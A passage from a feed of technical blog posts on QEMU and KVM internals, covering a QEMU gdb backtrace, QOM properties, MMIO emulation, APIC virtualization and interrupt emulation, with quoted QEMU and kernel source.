as=0x55ce2142c940 <address_space_memory>, addr=4276109316, val=33,
attrs=..., result=0x0) at /home/test/qemu/memory_ldst.inc.c:386
#6 0x000055ce1f80aff5 in stl_le_phys (
as=0x55ce2142c940 <address_space_memory>, addr=4276109316, val=33)
at /home/test/qemu/include/exec/memory_ldst_phys.inc.h:103
#7 0x000055ce1f80c8af in ioapic_service (s=0x61b000002a80)
at /home/test/qemu/hw/intc/ioapic.c:136
---Type <return> to continue, or q <return> to quit---
#8 0x000055ce1f80cb35 in ioapic_set_irq (opaque=0x61b000002a80, vector=15,
level=1) at /home/test/qemu/hw/intc/ioapic.c:175
#9 0x000055ce1fbe79a0 in qemu_set_irq (irq=0x60600006a880, level=1)
at hw/core/irq.c:45
#10 0x000055ce1f8bfb1c in gsi_handler (opaque=0x612000007540, n=15, level=1)
at /home/test/qemu/hw/i386/pc.c:120
#11 0x000055ce1fbe79a0 in qemu_set_irq (irq=0x6060000414e0, level=1)
at hw/core/irq.c:45
#12 0x000055ce1fc8a0f3 in bmdma_irq (opaque=0x6250001c3e10, n=0, level=1)
at hw/ide/pci.c:222
#13 0x000055ce1fbe79a0 in qemu_set_irq (irq=0x606000091280, level=1)
at hw/core/irq.c:45
#14 0x000055ce1fc7ba3c in qemu_irq_raise (irq=0x606000091280)
at /home/test/qemu/include/hw/irq.h:16
#15 0x000055ce1fc7bb20 in ide_set_irq (bus=0x6250001c32c0)
at /home/test/qemu/include/hw/ide/internal.h:568
#16 0x000055ce1fc7fa75 in ide_atapi_cmd_reply_end (s=0x6250001c3338)
at hw/ide/atapi.c:319
#17 0x000055ce1fc7902c in ide_data_readl (opaque=0x6250001c32c0, addr=368)
at hw/ide/core.c:2389
#18 0x000055ce1f713e32 in portio_read (opaque=0x614000002040, addr=0, size=4)
at /home/test/qemu/ioport.c:180
#19 0x000055ce1f7239bb in memory_region_read_accessor (mr=0x614000002040,
---Type <return> to continue, or q <return> to quit---
addr=0, value=0x7f329b8f8790, size=4, shift=0, mask=4294967295, attrs=...)
at /home/test/qemu/memory.c:435
#20 0x000055ce1f7244d6 in access_with_adjusted_size (addr=0,
value=0x7f329b8f8790, size=4, access_size_min=1, access_size_max=4,
access_fn=0x55ce1f723913 <memory_region_read_accessor>, mr=0x614000002040,
attrs=...) at /home/test/qemu/memory.c:593
#21 0x000055ce1f72aa42 in memory_region_dispatch_read1 (mr=0x614000002040,
addr=0, pval=0x7f329b8f8790, size=4, attrs=...)
at /home/test/qemu/memory.c:1392
#22 0x000055ce1f72ac25 in memory_region_dispatch_read (mr=0x614000002040,
addr=0, pval=0x7f329b8f8790, size=4, attrs=...)
at /home/test/qemu/memory.c:1423
#23 0x000055ce1f64cd0c in flatview_read_continue (fv=0x60600017f120, addr=368,
attrs=..., buf=0x7f329e50c004 "", len=4, addr1=0, l=4, mr=0x614000002040)
at /home/test/qemu/exec.c:3293
#24 0x000055ce1f64d028 in flatview_read (fv=0x60600017f120, addr=368,
attrs=..., buf=0x7f329e50c004 "", len=4) at /home/test/qemu/exec.c:3331
#25 0x000055ce1f64d0ed in address_space_read_full (
as=0x55ce2142c8c0 <address_space_io>, addr=368, attrs=...,
buf=0x7f329e50c004 "", len=4) at /home/test/qemu/exec.c:3344
#26 0x000055ce1f64d1c4 in address_space_rw (
as=0x55ce2142c8c0 <address_space_io>, addr=368, attrs=...,
buf=0x7f329e50c004 "", len=4, is_write=false)
---Type <return> to continue, or q <return> to quit---
at /home/test/qemu/exec.c:3374
#27 0x000055ce1f770021 in kvm_handle_io (port=368, attrs=...,
data=0x7f329e50c000, direction=0, size=4, count=2)
at /home/test/qemu/accel/kvm/kvm-all.c:1731
#28 0x000055ce1f7712f9 in kvm_cpu_exec (cpu=0x631000028800)
at /home/test/qemu/accel/kvm/kvm-all.c:1971
#29 0x000055ce1f6e5650 in qemu_kvm_cpu_thread_fn (arg=0x631000028800)
at /home/test/qemu/cpus.c:1257
#30 0x000055ce20354746 in qemu_thread_start (args=0x603000024a60)
at util/qemu-thread-posix.c:504
#31 0x00007f32a175b6db in start_thread (arg=0x7f329b8f9700)
at pthread_create.c:463
#32 0x00007f32a148488f in clone ()
</code></pre></div></div>
QOM Property2018-09-05T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2018/09/05/qom-property
<p>Long time ago, I have discussed the class-based polymorphism in QOM. I have left one important aspect, that’s property which implements a prototype-based polymorphism. Properties is the interface export to external. Devices can set/get the property staticlly or dynamically. In this blog I will discuss how property is stored in QOM and how it interacts with other parts of QEMU.</p>
<h3> Data structure </h3>
<p>Both struct ‘ObjectClass’ and ‘Object’ has a GHashTable ‘properties’ fields, the former represents the common class properties and the latter represents the object’s properties.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>struct ObjectClass
{
/*< private >*/
Type type;
GSList *interfaces;
const char *object_cast_cache[OBJECT_CLASS_CAST_CACHE];
const char *class_cast_cache[OBJECT_CLASS_CAST_CACHE];
ObjectUnparent *unparent;
GHashTable *properties;
};
struct Object
{
/*< private >*/
ObjectClass *class;
ObjectFree *free;
GHashTable *properties;
uint32_t ref;
Object *parent;
};
</code></pre></div></div>
<p>A property is represented by struct ‘ObjectProperty’. It contains the basic information and the getter and setter function pointer.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>typedef struct ObjectProperty
{
gchar *name;
gchar *type;
gchar *description;
ObjectPropertyAccessor *get;
ObjectPropertyAccessor *set;
ObjectPropertyResolve *resolve;
ObjectPropertyRelease *release;
void *opaque;
} ObjectProperty;
</code></pre></div></div>
<p>‘ObjectProperty’ is insert in the ‘properties’ hashtable, including struct ‘ObjectClass’ and ‘Object’.</p>
<p>For every kind of property, there is a concrete struct to describe it. For example.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>//link property
typedef struct {
Object **child;
void (*check)(const Object *, const char *, Object *, Error **);
ObjectPropertyLinkFlags flags;
} LinkProperty;
//string property
typedef struct StringProperty
{
char *(*get)(Object *, Error **);
void (*set)(Object *, const char *, Error **);
} StringProperty;
//bool property
typedef struct BoolProperty
{
bool (*get)(Object *, Error **);
void (*set)(Object *, bool, Error **);
} BoolProperty;
</code></pre></div></div>
<p>This concrete property is stored in the ‘ObjectProperty’s opaque field.
Following picture the relation of these structures.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Object
+-----------+
| |
| |
+-----------+
| properties+----------+---------------------------------------------------->
+-----------+ ^
| | |
| | |
+-----------+ +---+----+
| name |
+--------+
| type |
+--------+
| set +-> property_set_bool
+--------+
| get +-> property_get_bool
+--------+
| opaque +----+ +---------+
+--------+ | get +--> memfd_backend_get_seal
ObjectProperty +---------+
| set +--> memfd_backend_set_seal
+---------+
BoolProperty
</code></pre></div></div>
<h3> Interface </h3>
<p>‘object_property_add’ is used to add a property to Object.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>ObjectProperty *
object_property_add(Object *obj, const char *name, const char *type,
ObjectPropertyAccessor *get,
ObjectPropertyAccessor *set,
ObjectPropertyRelease *release,
void *opaque, Error **errp)
{
ObjectProperty *prop;
size_t name_len = strlen(name);
if (name_len >= 3 && !memcmp(name + name_len - 3, "[*]", 4)) {
int i;
ObjectProperty *ret;
char *name_no_array = g_strdup(name);
name_no_array[name_len - 3] = '\0';
for (i = 0; ; ++i) {
char *full_name = g_strdup_printf("%s[%d]", name_no_array, i);
ret = object_property_add(obj, full_name, type, get, set,
release, opaque, NULL);
g_free(full_name);
if (ret) {
break;
}
}
g_free(name_no_array);
return ret;
}
if (object_property_find(obj, name, NULL) != NULL) {
error_setg(errp, "attempt to add duplicate property '%s'"
" to object (type '%s')", name,
object_get_typename(obj));
return NULL;
}
prop = g_malloc0(sizeof(*prop));
prop->name = g_strdup(name);
prop->type = g_strdup(type);
prop->get = get;
prop->set = set;
prop->release = release;
prop->opaque = opaque;
g_hash_table_insert(obj->properties, prop->name, prop);
return prop;
}
</code></pre></div></div>
<p>First find if the ‘property’ name exists already, if not, just allocates a new ObjectProperty and insert it to the hashtable. The [*] case is not discussed here.</p>
<p>‘object_property_find’ is used to find if the Object has a property, this function will search all of the parent class’ properties of the object.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>ObjectProperty *object_property_find(Object *obj, const char *name,
Error **errp)
{
ObjectProperty *prop;
ObjectClass *klass = object_get_class(obj);
prop = object_class_property_find(klass, name, NULL);
if (prop) {
return prop;
}
prop = g_hash_table_lookup(obj->properties, name);
if (prop) {
return prop;
}
error_setg(errp, "Property '.%s' not found", name);
return NULL;
}
</code></pre></div></div>
<h3> Example </h3>
<p>Let’s take the ‘TYPE_DEVICE’ as example.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static const TypeInfo device_type_info = {
.name = TYPE_DEVICE,
.parent = TYPE_OBJECT,
.instance_size = sizeof(DeviceState),
.instance_init = device_initfn,
.instance_post_init = device_post_init,
.instance_finalize = device_finalize,
.class_base_init = device_class_base_init,
.class_init = device_class_init,
.abstract = true,
.class_size = sizeof(DeviceClass),
};
</code></pre></div></div>
<p>The instance init function is ‘device_initfn’. In this function we add some property such as ‘realized’, ‘hotpluggable’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static void device_initfn(Object *obj)
{
DeviceState *dev = DEVICE(obj);
ObjectClass *class;
Property *prop;
if (qdev_hotplug) {
dev->hotplugged = 1;
qdev_hot_added = true;
}
dev->instance_id_alias = -1;
dev->realized = false;
object_property_add_bool(obj, "realized",
device_get_realized, device_set_realized, NULL);
object_property_add_bool(obj, "hotpluggable",
device_get_hotpluggable, NULL, NULL);
object_property_add_bool(obj, "hotplugged",
device_get_hotplugged, NULL,
&error_abort);
class = object_get_class(OBJECT(dev));
do {
for (prop = DEVICE_CLASS(class)->props; prop && prop->name; prop++) {
qdev_property_add_legacy(dev, prop, &error_abort);
qdev_property_add_static(dev, prop, &error_abort);
}
class = object_class_get_parent(class);
} while (class != object_class_by_name(TYPE_DEVICE));
object_property_add_link(OBJECT(dev), "parent_bus", TYPE_BUS,
(Object **)&dev->parent_bus, NULL, 0,
&error_abort);
QLIST_INIT(&dev->gpios);
}
</code></pre></div></div>
<p>The setter of ‘realized’ property function is ‘device_set_realized’.</p>
<p>For each device option in qemu command line, the main function calls ‘device_init_func’ which calls ‘qdev_device_add’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static int device_init_func(void *opaque, QemuOpts *opts, Error **errp)
{
Error *err = NULL;
DeviceState *dev;
dev = qdev_device_add(opts, &err);
if (!dev) {
error_report_err(err);
return -1;
}
object_unref(OBJECT(dev));
return 0;
}
</code></pre></div></div>
<p>In the it calls ‘object_property_set_bool’ to set the ‘realized’ property to be true.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> object_property_set_bool(OBJECT(dev), true, "realized", &err);
</code></pre></div></div>
<p>The object_property_set_bool’ calls ‘object_property_set’ and the latter function first calls the ObjectProperty’s set function(‘property_set_bool’), then in ‘property_set_bool’ it calls the BoolProperty’s set function, this is ‘device_set_realized’. So finally in ‘device_set_realized’ this function calls the DeviceClass’s realize function and initialized the device.</p>
KVM MMIO implementation2018-09-03T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2018/09/03/kvm-mmio
<p>As already know, we can access devices by PIO and MMIO to drive devices to work. For PIO, we can set the VMCS to intercept the specified port. But how MMIO emulation is implemented? This blog will discuss this.</p>
<p>For a summary, the following shows the process of MMIO implementation:</p>
<ol>
<li>QEMU declares a memory region(but not allocate ram or commit it to kvm)</li>
<li>Guest first access the MMIO address, cause a EPT violation VM-exit</li>
<li>KVM construct the EPT page table and marks the page table entry with special mark(110b)</li>
<li>Later the guest access these MMIO, it will be processed by EPT misconfig VM-exit handler</li>
</ol>
<h3> QEMU part </h3>
<p>QEMU uses function ‘memory_region_init_io’ to declare a MMIO region. Here we can see the ‘mr->ram’ is false so no really memory is allocated.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>void memory_region_init_io(MemoryRegion *mr,
Object *owner,
const MemoryRegionOps *ops,
void *opaque,
const char *name,
uint64_t size)
{
memory_region_init(mr, owner, name, size);
mr->ops = ops ? ops : &unassigned_mem_ops;
mr->opaque = opaque;
mr->terminates = true;
}
void memory_region_init_ram(MemoryRegion *mr,
Object *owner,
const char *name,
uint64_t size,
Error **errp)
{
memory_region_init(mr, owner, name, size);
mr->ram = true;
mr->terminates = true;
mr->destructor = memory_region_destructor_ram;
mr->ram_block = qemu_ram_alloc(size, mr, errp);
mr->dirty_log_mask = tcg_enabled() ? (1 << DIRTY_MEMORY_CODE) : 0;
}
</code></pre></div></div>
<p>When we commit this region to kvm it calls ‘kvm_region_add’ and ‘kvm_set_phys_mem’ will be called. If this is not a ram, it will just return and no memslot created/updated in kvm.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static void kvm_set_phys_mem(KVMMemoryListener *kml,
MemoryRegionSection *section, bool add)
{
KVMState *s = kvm_state;
KVMSlot *mem, old;
int err;
MemoryRegion *mr = section->mr;
bool writeable = !mr->readonly && !mr->rom_device;
if (!memory_region_is_ram(mr)) {
if (writeable || !kvm_readonly_mem_allowed) {
return;
} else if (!mr->romd_mode) {
/* If the memory device is not in romd_mode, then we actually want
* to remove the kvm memory slot so all accesses will trap. */
add = false;
}
}
}
</code></pre></div></div>
<h3> KVM part </h3>
<p>In ‘vmx_init’, when ept enabled, it calls ‘ept_set_mmio_spte_mask’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static void ept_set_mmio_spte_mask(void)
{
/*
* EPT Misconfigurations can be generated if the value of bits 2:0
* of an EPT paging-structure entry is 110b (write/execute).
* Also, magic bits (0x3ull << 62) is set to quickly identify mmio
* spte.
*/
kvm_mmu_set_mmio_spte_mask((0x3ull << 62) | 0x6ull);
}
void kvm_mmu_set_mmio_spte_mask(u64 mmio_mask)
{
shadow_mmio_mask = mmio_mask;
}
</code></pre></div></div>
<p>Here set ‘shadow_mmio_mask’.</p>
<p>We the guest access the MMIO address, the VM will exit caused by ept violation and ‘tdp_page_fault’ will be called. ‘__direct_map’ will be called to construct the EPT page table.</p>
<p>After the long call-chain, the final function ‘mark_mmio_spte’ will be called to set the spte with ‘shadow_mmio_mask’ which as we already know is set when the vmx initialization.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>__direct_map
-->mmu_set_spte
-->set_spte
-->set_mmio_spte
-->mark_mmio_spte
</code></pre></div></div>
<p>The condition to call ‘mark_mmio_spte’ is ‘is_noslot_pfn’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static bool set_mmio_spte(struct kvm *kvm, u64 *sptep, gfn_t gfn,
pfn_t pfn, unsigned access)
{
if (unlikely(is_noslot_pfn(pfn))) {
mark_mmio_spte(kvm, sptep, gfn, access);
return true;
}
return false;
}
static inline bool is_noslot_pfn(pfn_t pfn)
{
return pfn == KVM_PFN_NOSLOT;
}
</code></pre></div></div>
<p>As we know the QEMU doesn’t commit the MMIO memory region, so pfn is ‘KVM_PFN_NOSLOT’ and then mark the spte with ‘shadow_mmio_mask’.</p>
<p>When the guest later access this MMIO page, as it’s ept page table entry is 110b, this will cause the VM exit by EPT misconfig, any how can a page be write/execute but no read permission. In the handler ‘handle_ept_misconfig’ it first process the MMIO case this will dispatch to the QEMU part.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static int handle_ept_misconfig(struct kvm_vcpu *vcpu)
{
u64 sptes[4];
int nr_sptes, i, ret;
gpa_t gpa;
gpa = vmcs_read64(GUEST_PHYSICAL_ADDRESS);
ret = handle_mmio_page_fault_common(vcpu, gpa, true);
if (likely(ret == RET_MMIO_PF_EMULATE))
return x86_emulate_instruction(vcpu, gpa, 0, NULL, 0) ==
EMULATE_DONE;
if (unlikely(ret == RET_MMIO_PF_INVALID))
return kvm_mmu_page_fault(vcpu, gpa, 0, NULL, 0);
if (unlikely(ret == RET_MMIO_PF_RETRY))
return 1;
/* It is the real ept misconfig */
printk(KERN_ERR "EPT: Misconfiguration.\n");
printk(KERN_ERR "EPT: GPA: 0x%llx\n", gpa);
nr_sptes = kvm_mmu_get_spte_hierarchy(vcpu, gpa, sptes);
for (i = PT64_ROOT_LEVEL; i > PT64_ROOT_LEVEL - nr_sptes; --i)
ept_misconfig_inspect_spte(vcpu, sptes[i-1], i);
vcpu->run->exit_reason = KVM_EXIT_UNKNOWN;
vcpu->run->hw.hardware_exit_reason = EXIT_REASON_EPT_MISCONFIG;
return 0;
}
</code></pre></div></div>
Local APIC virtualization2018-08-29T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2018/08/29/apicv
<h3> Background </h3>
<p>In the last article, I write something about the software interrupt virtualization, the implementation of pic/ioapic/apic emulation in kvm. We know that in software emulation, for every guest-interrupt a VM-exit is needed, this is a very remarkable overhead for virtualization. As no surprise, the Intel has sollutions to solve this issue. This is called APIC virtualization.</p>
<p>Before we go to the APIC virtualization, we need first know something about local apic. The local APIC and IO APIC is for interrupt delivery in multi processors. Following picture shows the relations between IO APIC and local APIC.</p>
<p><img src="/assets/img/apicv/1.png" alt="" /></p>
<p>In a word, every CPU has an accompanying local APIC (LAPIC) and the IOAPIC is used to dispatch interrupt to the LAPIC.</p>
<h3> LAPIC base address </h3>
<p>Software interacts with the local APIC by reading and writing its registers. APIC registers are memory-mapped to a 4-KByte region of the processor’s physical address space with an initial starting address of FEE00000H. For correct APIC operation, this address space must be mapped to an area of memory that has been designated as strong uncacheable (UC).</p>
<p>Here we should notice the FEE00000H is the physical address space, not the physical memory. What is the difference? I think physical address space is from CPU perspective. When the CPU reads/writes the APIC registers, it will process by the APIC just like intercept and will never go to the memory address. Though there is one LAPCI per CPU core, and they all map to the same address, when the CPU reads/writes this address, it will just access his own LAPIC and there is no conflicts.</p>
<h3> APIC virtualization </h3>
<p>So how to implement the feature in virtualization. I mean every VCPU can access their own physical address with the same address, but get the private data belong to the VCPU. Let’s first look at the qemu’s implementation. In LAPIC realize:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static void apic_realize(DeviceState *dev, Error **errp)
{
APICCommonState *s = APIC(dev);
if (s->id >= MAX_APICS) {
error_setg(errp, "%s initialization failed. APIC ID %d is invalid",
object_get_typename(OBJECT(dev)), s->id);
return;
}
memory_region_init_io(&s->io_memory, OBJECT(s), &apic_io_ops, s, "apic-msi",
APIC_SPACE_SIZE);
s->timer = timer_new_ns(QEMU_CLOCK_VIRTUAL, apic_timer, s);
local_apics[s->id] = s;
msi_nonbroken = true;
}
</code></pre></div></div>
<p>We can see, the creating apic is stored in a global variable ‘local_apics’. In the access function, the function first need to decide the VCPU which is accessing the registers.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static void apic_mem_writel(void *opaque, hwaddr addr, uint32_t val)
{
DeviceState *dev;
APICCommonState *s;
int index = (addr >> 4) & 0xff;
if (addr > 0xfff || !index) {
/* MSI and MMIO APIC are at the same memory location,
* but actually not on the global bus: MSI is on PCI bus
* APIC is connected directly to the CPU.
* Mapping them on the global bus happens to work because
* MSI registers are reserved in APIC MMIO and vice versa. */
MSIMessage msi = { .address = addr, .data = val };
apic_send_msi(&msi);
return;
}
dev = cpu_get_current_apic();
if (!dev) {
return;
}
s = APIC(dev);
}
</code></pre></div></div>
<p>The idea behind qemu is easy, first get the current VCPU and then access his lapic. But how can this be done in APIC virtualization. How can CPU implement this without VM-exit. The secret is APIC-access page and virtual-APIC page. Here I will not go to the complicated detail of these two VMCS field. Just treat the virtual-APIC page as the shadow page of APIC-access page. And APIC-access page is for a VM, virtual-APIC page is for a VCPU. In fully APIC virtualization, When the guest access the APIC-access page the CPU will return the corresponding data in the virtual-APIC page.</p>
<p>The APIC-access page is set in ‘kvm->kvm_arch->apic_access_page’ and allocated in ‘alloc_apic_access_page’:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static int alloc_apic_access_page(struct kvm *kvm)
{
struct page *page;
struct kvm_userspace_memory_region kvm_userspace_mem;
int r = 0;
mutex_lock(&kvm->slots_lock);
if (kvm->arch.apic_access_page)
goto out;
kvm_userspace_mem.slot = APIC_ACCESS_PAGE_PRIVATE_MEMSLOT;
kvm_userspace_mem.flags = 0;
kvm_userspace_mem.guest_phys_addr = 0xfee00000ULL;
kvm_userspace_mem.memory_size = PAGE_SIZE;
r = __kvm_set_memory_region(kvm, &kvm_userspace_mem);
if (r)
goto out;
page = gfn_to_page(kvm, 0xfee00);
if (is_error_page(page)) {
r = -EFAULT;
goto out;
}
kvm->arch.apic_access_page = page;
out:
mutex_unlock(&kvm->slots_lock);
return r;
}
</code></pre></div></div>
<p>Here we allocates the memslot of 0xfee00000 and set this to ‘apic_access_page’.
The virtual-apic page is based in ‘kvm_lapic->regs’ and is allocated in :</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>int kvm_create_lapic(struct kvm_vcpu *vcpu)
{
struct kvm_lapic *apic;
ASSERT(vcpu != NULL);
apic_debug("apic_init %d\n", vcpu->vcpu_id);
apic = kzalloc(sizeof(*apic), GFP_KERNEL);
if (!apic)
goto nomem;
vcpu->arch.apic = apic;
apic->regs = (void *)get_zeroed_page(GFP_KERNEL);
if (!apic->regs) {
printk(KERN_ERR "malloc apic regs error for vcpu %x\n",
vcpu->vcpu_id);
goto nomem_free_apic;
}
apic->vcpu = vcpu;
...
}
</code></pre></div></div>
<p>Then in ‘vmx_vcpu_reset’, it writes the APIC-access page and virtual-apic page to VMCS.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static void vmx_vcpu_reset(struct kvm_vcpu *vcpu)
{
struct vcpu_vmx *vmx = to_vmx(vcpu);
if (cpu_has_vmx_tpr_shadow()) {
vmcs_write64(VIRTUAL_APIC_PAGE_ADDR, 0);
if (vm_need_tpr_shadow(vmx->vcpu.kvm))
vmcs_write64(VIRTUAL_APIC_PAGE_ADDR,
__pa(vmx->vcpu.arch.apic->regs));
vmcs_write32(TPR_THRESHOLD, 0);
}
if (vm_need_virtualize_apic_accesses(vmx->vcpu.kvm))
vmcs_write64(APIC_ACCESS_ADDR,
page_to_phys(vmx->vcpu.kvm->arch.apic_access_page));
if (vmx_vm_has_apicv(vcpu->kvm))
memset(&vmx->pi_desc, 0, sizeof(struct pi_desc));
if (vmx->vpid != 0)
vmcs_write16(VIRTUAL_PROCESSOR_ID, vmx->vpid);
vpid_sync_context(vmx);
}
</code></pre></div></div>
<p>When the guest access the APIC register(from base 0xfee00000) it will then access the virtual-APIC page of the corresponding VCPU.</p>
<p>Later article will discuss the virtual interrupt delivery in APIC virtualization.</p>
<h3> Reference </h3>
<ol>
<li>Intel SDM</li>
<li>
<p>https://software.intel.com/en-us/forums/intel-moderncode-for-parallel-architectures/topic/296237</p>
</li>
<li>https://software.intel.com/en-us/forums/virtualization-software-development/topic/284386</li>
</ol>
kvm interrupt emulation2018-08-27T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2018/08/27/kvm-interrupt-emulation
<h3> External interrupt </h3>
<p>First of all, let’s clarify the external interrupt in kvm. This kind of interrupt means the interrupt for the host. kvm will be caused vm-exit when the CPU receives the external interrupt. THis is configured by flag PIN_BASED_EXT_INTR_MASK which is write to the VMCS’s pin-based VM-execution control field in function setup_vmcs_config. When the external interrupts comes, it will call handle_external_intr callback.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>kvm_x86_ops->handle_external_intr(vcpu);
</code></pre></div></div>
<p>For intel CPU, this is the ‘vmx_handle_external_intr’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static void vmx_handle_external_intr(struct kvm_vcpu *vcpu)
{
u32 exit_intr_info = vmcs_read32(VM_EXIT_INTR_INFO);
/*
* If external interrupt exists, IF bit is set in rflags/eflags on the
* interrupt stack frame, and interrupt will be enabled on a return
* from interrupt handler.
*/
if ((exit_intr_info & (INTR_INFO_VALID_MASK | INTR_INFO_INTR_TYPE_MASK))
== (INTR_INFO_VALID_MASK | INTR_TYPE_EXT_INTR)) {
unsigned int vector;
unsigned long entry;
gate_desc *desc;
struct vcpu_vmx *vmx = to_vmx(vcpu);
#ifdef CONFIG_X86_64
unsigned long tmp;
#endif
vector = exit_intr_info & INTR_INFO_VECTOR_MASK;
desc = (gate_desc *)vmx->host_idt_base + vector;
entry = gate_offset(*desc);
asm volatile(
#ifdef CONFIG_X86_64
"mov %%" _ASM_SP ", %[sp]\n\t"
"and $0xfffffffffffffff0, %%" _ASM_SP "\n\t"
"push $%c[ss]\n\t"
"push %[sp]\n\t"
#endif
"pushf\n\t"
"orl $0x200, (%%" _ASM_SP ")\n\t"
__ASM_SIZE(push) " $%c[cs]\n\t"
"call *%[entry]\n\t"
:
#ifdef CONFIG_X86_64
[sp]"=&r"(tmp)
#endif
:
[entry]"r"(entry),
[ss]"i"(__KERNEL_DS),
[cs]"i"(__KERNEL_CS)
);
} else
local_irq_enable();
}
</code></pre></div></div>
<p>Here check is there a valid external interrupt exists(INTR_INFO_VALID_MASK ). If there is, just call the host interrupt handler.</p>
<p>That’s so easy, no mysterious.</p>
<h3> Interrupt delivery methods </h3>
<p>There are three generations of interrupt delivery and servicing on Intel architecture: XT-PIC for legacy uni-processor (UP) systems, IO-APIC for modern UP and multi-processor (MP) systems, and MSI.</p>
<h4> XT-PIC </h4>
<p>XT-PIC is the oldest form of interrupt delivery. It uses two intel 8259 PIC chips and each PIC chips has eight interrupts.</p>
<p><img src="/assets/img/kvminterrupt/1.png" alt="" /></p>
<p>When a connected device needs servicing by the CPU, it drives the signal on the interrupt pin to which it is connected. The 8259 PIC in turn drives the interrupt line into the CPU. From the Intel 8259 PIC, the OS is able to determine what interrupt is pending. The CPU masks that interrupt and begins running the ISR associated with it. The ISR will check with the device with which it is associated for a pending interrupt. If the device has a pending interrupt, then the ISR will clear the Interrupt Request (IRQ) pending and begin servicing the device. Once the ISR has completed servicing the device, it will schedule a tasklet if more processing is needed and return control back to the OS, indicating that it handled an interrupt. Once the OS has serviced the interrupt, it will unmask the interrupt from the Intel 8259 PIC and run any tasklet which has been scheduled. </p>
<h4> IO-APIC </h4>
<p>When intel developed multiprocessor, he also introduced the concept of a Local-APIC (Advanced PIC) in the CPU and IO-APICs connected to devices. each IO-APIC (82093) has 24 interrupt lines. The IO-APCI provides backwards compatibility with the older XT-PIC model. As a result, the lower 16 interrupts are usually dedicated to their assignments under the XT-PIC model. This assignment of interrupts provides only eight additional interrupts, which forces sharing.The following is the sequence for IO-APIC delivery and servicing:
• A device needing servicing from the CPU drives the interrupt line into the IO-APIC associated with it.
• The IO-APIC writes the interrupt vector associated with its driven interrupt line into the Local APIC of the CPU.
• The interrupted CPU begins running the ISRs associated with the interrupt vector it received.
Each ISR for a shared interrupt is run to find the device needing service.
Each device has its IRQ pending bit checked, and the requesting device has its bit cleared. </p>
<h4> Message Signaled Interrupts (MSI) </h4>
<p>The MSI model eliminates the devices’ need to use the IO-APIC, allowing every device to write directly to the CPU’s Local-APIC. The MSI model supports 224 interrupts, and, with this high number of interrupts, IRQ sharing is no longer allowed. The following is the sequence for MSI delivery and servicing:
• A device needing servicing from the CPU generates an MSI, writing the interrupt vector directly into the Local-APIC of the CPU servicing it.
• The interrupted CPU begins running the ISR associated with the interrupt vector it received. The device is serviced without any need to check and clear an IRQ pending bit</p>
<p>Following picture shows the relations of the three methods(From https://cloud.tencent.com/developer/article/1087271).</p>
<p><img src="/assets/img/kvminterrupt/2.png" alt="" /></p>
<p>For the hardware the interrupt is generated by the device itself, so in virtualization environment the interrupt is generated in the device emulation. It can be generated both in qemu (device emulation implementation in userspace) kvm (device emulation implementation in kernel space).</p>
<p>The device emulation trigger an irq(< 16) and this will be both deliveried to i8259 and io-apic, and io-apic format the interrupt message and routing it to lapic. So there are three interrupt controller device need be emulated, the i8259, the io-apic and the lapic device. All of these devices can be implemented in qemu or in kvm all pic and io-apic in qemu and lapic in kvm.</p>
<p>Let’s first talk about the implementation in kvm.</p>
<h3> KVM impplements the irqchip </h3>
<h4> The initialization of PIC and IO-APIC </h4>
<p>PIC and IO-APIC is created by the VM ioctl ‘KVM_CREATE_IRQCHIP’. It’s called in ‘kvm_irqchip_create’ in qemu and is implemented in ‘kvm_arch_vm_ioctl’ in kvm.
pic is created by function ‘kvm_create_pic’ and assigned to the ‘kvm->arch.vpic’. In the creation function, it allocates ‘kvm_pic’ and also register the device’s read/write ops.</p>
<p>Follow on the pic, it creates ioapic using function ‘kvm_ioapic_init’, like pic, the creation function allocates a ‘kvm_ioapic’ and register the read/write ops and also, assign this to the ‘kvm->arch.vioapic’.</p>
<p>After create the pic and ioapic, it calls ‘kvm_setup_default_irq_routing’ to setup the routing table.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>int kvm_setup_default_irq_routing(struct kvm *kvm)
{
return kvm_set_irq_routing(kvm, default_routing,
ARRAY_SIZE(default_routing), 0);
}
int kvm_set_irq_routing(struct kvm *kvm,
const struct kvm_irq_routing_entry *ue,
unsigned nr,
unsigned flags)
{
struct kvm_irq_routing_table *new, *old;
u32 i, j, nr_rt_entries = 0;
int r;
for (i = 0; i < nr; ++i) {
if (ue[i].gsi >= KVM_MAX_IRQ_ROUTES)
return -EINVAL;
